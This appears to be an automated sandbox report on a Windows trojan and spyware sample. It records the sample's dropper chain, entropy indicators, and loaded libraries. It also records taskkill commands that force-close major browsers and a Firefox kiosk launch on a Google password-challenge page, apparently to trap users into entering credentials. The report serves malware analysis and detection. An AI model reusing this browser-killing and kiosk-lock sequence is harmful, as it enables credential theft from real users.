Source: file.exe, 00000000.00000003.1478429945.0000000005CEA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1469187666.0000000005C66000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1471989187.0000000005D6D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1473467060.0000000005CA2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1476702599.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1472947460.0000000005D8E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1466895239.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1474363438.0000000005CB7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1470219497.0000000005C85000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1473279501.0000000005D99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1478075094.0000000005BC7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1485437996.0000000005E4F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1478889505.0000000005BC3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1471058129.0000000005D57000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1475529681.0000000005BC8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1469775682.0000000005BC6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1471160760.0000000005BD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1480229201.0000000005E31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1470773414.0000000005C8D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1476296033.0000000005BC2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1481383490.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1478573723.0000000005BC4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1475282820.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1506423056.0000000005BC4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1471875356.0000000005C99000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1470534545.0000000005D37000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1477476635.0000000005CE9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1464097002.0000000005C5F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1483431135.0000000005E36000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1476985539.0000000005DED000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1475909857.0000000005DCF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1474842794.0000000005BCD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1478173531.0000000005CEA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1477120864.0000000005BCB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1463690814.000000000586F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1510540713.0000000005722000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1470012229.0000000005D3A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1510713355.000000000110D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1474111254.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1466473876.0000000005BC9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1468817806.0000000005BCF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1476059146.0000000005BC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1473186618.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1472216136.0000000005CA1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1479498056.0000000005CE5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1473072585.0000000005BC9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1476174408.0000000005CC4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1476577369.0000000005DCC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1471768953.0000000005BC9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1472432544.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1469580039.0000000005BC6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9979244220219435
Source: 4XW8W5G3AUTSGA2M5UZH7L9.exe.0.dr Static PE information: Section: ZLIB complexity 0.998052196866485
Source: 4XW8W5G3AUTSGA2M5UZH7L9.exe.0.dr Static PE information: Section: cicynwpg ZLIB complexity 0.9946367793580773
Source: skotes.exe.11.dr Static PE information: Section: ZLIB complexity 0.998052196866485
Source: skotes.exe.11.dr Static PE information: Section: cicynwpg ZLIB complexity 0.9946367793580773
Source: random[1].exe.17.dr Static PE information: Section: ZLIB complexity 0.9979244220219435
Source: 100bc97ff1.exe.17.dr Static PE information: Section: ZLIB complexity 0.9979244220219435
Source: random[1].exe0.17.dr Static PE information: Section: ksqqhkwn ZLIB complexity 0.99493408203125
Source: 76bf5a4dba.exe.17.dr Static PE information: Section: ksqqhkwn ZLIB complexity 0.99493408203125
Source: 4XW8W5G3AUTSGA2M5UZH7L9.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe.17.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.11.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 100bc97ff1.exe.17.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@48/27@46/12
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Code function: 10_2_04BD15D0 ChangeServiceConfigA, 10_2_04BD15D0
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user~1\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT * FROM events WHERE timestamp BETWEEN date(:dateFrom) AND date(:dateTo);
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE events (id INTEGER PRIMARY KEY, type INTEGER NOT NULL, count INTEGER NOT NULL, timestamp DATE );
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: INSERT INTO events (type, count, timestamp) VALUES (:type, 1, date(:date));
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE events SET count = count + 1 WHERE id = :id;DELETE FROM events WHERE timestamp >= date(:date);SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;FX_URLBAR_QUICK_SUGGEST_REMOTE_SETTINGS_LATENCY_MSget MAP_KEYWORD_PREFIXES_STARTING_AT_FIRST_WORD/<#setCountersResetInterval/this._impressionCountersResetInterval<resource://services-settings/remote-settings.sys.mjsresource:///modules/urlbar/private/BaseFeature.sys.mjsbrowser.urlbar.quicksuggest.impressionCaps.stats changedurlbar-result-menu-learn-more-about-firefox-suggesturlbar-result-menu-learn-more-about-firefox-suggesturlbar-result-menu-learn-more-about-firefox-suggestNo keywords defined, stopping suggestion fetchingget MAP_KEYWORD_PREFIXES_STARTING_AT_FIRST_WORD/</prefix<resource://gre/modules/PrivateBrowsingUtils.sys.mjsbrowser.tabs.remote.separatePrivilegedMozillaWebContentProcessRejected FxA webchannel message from remoteType = keyRotationSecret must be a 64-character hex stringbrowser.urlbar.quicksuggest.blockedDigests value: keyRotationTimestamp must round to a 10-digit numberTrackingDBService: Shutting down the content blocking database.QuickSuggest: Record impression counters reset telemetrybrowser.urlbar.quicksuggest.blockedDigests changedMin length is undefined or zero, using full keywordsUnable to check for private browsing mode, assuming trueThe FxA server did not grant Firefox the `oldsync` scopeFxA WebChannel functionaly is disabled due to no URI pref.amazondotcom@search.mozilla.orgdefaulturlbar-result-menu-learn-more-about-firefox-suggestbrowser.contentblocking.cfr-milestone.milestone-achievedbrowser.contentblocking.cfr-milestone.update-interval
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2924896477.000001DF1C617000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT sum(count) FROM events;
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: UPDATE events SET count = count + 1 WHERE id = :id;
Source: file.exe, 00000000.00000003.1328896165.0000000005765000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1315207891.0000000005756000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1315542110.0000000005738000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2256896884.0000000005732000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2256657405.0000000005713000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2270349906.0000000005731000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000013.00000003.2257383273.0000000005700000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2401823545.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, 100bc97ff1.exe, 00000015.00000003.2417964877.0000000005C25000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT * FROM events WHERE type = :type AND timestamp = date(:date);
Source: file.exe ReversingLabs: Detection: 39%
Source: M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: 4XW8W5G3AUTSGA2M5UZH7L9.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe "C:\Users\user~1\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe "C:\Users\user~1\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe"
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe "C:\Users\user~1\AppData\Local\Temp\1002596001\100bc97ff1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe "C:\Users\user~1\AppData\Local\Temp\1002597001\76bf5a4dba.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe "C:\Users\user~1\AppData\Local\Temp\1002596001\100bc97ff1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe "C:\Users\user~1\AppData\Local\Temp\1002598001\ee3f3c2bda.exe"
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2288 -parentBuildID 20230927232528 -prefsHandle 2224 -prefMapHandle 2220 -prefsLen 25302 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {db3c9087-adfb-46b4-b057-3fef806f712c} 8076 "\\.\pipe\gecko-crash-server-pipe.8076" 1df0ee6df10 socket
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002599001\num.exe "C:\Users\user~1\AppData\Local\Temp\1002599001\num.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe "C:\Users\user~1\AppData\Local\Temp\1002597001\76bf5a4dba.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=920 -parentBuildID 20230927232528 -prefsHandle 3540 -prefMapHandle 2836 -prefsLen 26317 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c503f6a-c2b4-4421-a458-09ae7f72f09c} 8076 "\\.\pipe\gecko-crash-server-pipe.8076" 1df2101c210 rdd
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002600001\test.exe "C:\Users\user~1\AppData\Local\Temp\1002600001\test.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe "C:\Users\user~1\AppData\Local\Temp\M0LIFBH5YXA7UY5T49ZOOBXLNF0YM.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe "C:\Users\user~1\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4XW8W5G3AUTSGA2M5UZH7L9.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe "C:\Users\user~1\AppData\Local\Temp\1002596001\100bc97ff1.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002597001\76bf5a4dba.exe "C:\Users\user~1\AppData\Local\Temp\1002597001\76bf5a4dba.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe "C:\Users\user~1\AppData\Local\Temp\1002598001\ee3f3c2bda.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002599001\num.exe "C:\Users\user~1\AppData\Local\Temp\1002599001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002600001\test.exe "C:\Users\user~1\AppData\Local\Temp\1002600001\test.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002598001\ee3f3c2bda.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2288 -parentBuildID 20230927232528 -prefsHandle 2224 -prefMapHandle 2220 -prefsLen 25302 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {db3c9087-adfb-46b4-b057-3fef806f712c} 8076 "\\.\pipe\gecko-crash-server-pipe.8076" 1df0ee6df10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=920 -parentBuildID 20230927232528 -prefsHandle 3540 -prefMapHandle 2836 -prefsLen 26317 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c503f6a-c2b4-4421-a458-09ae7f72f09c} 8076 "\\.\pipe\gecko-crash-server-pipe.8076" 1df2101c210 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
